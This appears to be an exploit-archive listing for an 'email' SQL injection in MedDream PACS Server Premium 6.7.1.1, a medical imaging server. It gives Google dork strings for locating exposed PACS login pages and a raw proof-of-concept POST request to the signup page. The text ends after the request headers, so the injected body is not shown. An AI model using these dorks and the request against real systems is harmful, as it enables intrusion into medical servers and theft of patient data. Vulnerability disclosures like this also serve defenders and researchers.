Exploits / Vulnerability Discovered : 2018-09-07 |
Type : webapps |
Platform : php
This exploit / vulnerability Meddream pacs server premium 6.7.1.1 email sql injection is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: MedDream PACS Server Premium 6.7.1.1 - 'email' SQL Injection
# Date: 2018-05-23
# Software https://www.softneta.com/products/meddream-pacs-server/downloads.html
# Version: MedDreamPACS Premium 6.7.1.1
# Exploit Author: Carlos Avila
# Google Dork: inurl:Pacs/login.php, inurl:pacsone filetype:php home, inurl:pacsone filetype:php login
# Category: webapps
# Tested on: Windows
# http://twitter.com/badboy_nt
# Proof of Concept
POST /Pacs/userSignup.php HTTP/1.1
Host: 192.168.6.107
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.6.107/Pacs/userSignup.php?hostname=localhost&database=dicom
Content-Type: application/x-www-form-urlencoded
Content-Length: 129
Cookie: PHPSESSID=4l1c7irpgk1apcqk7ll9d89104
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1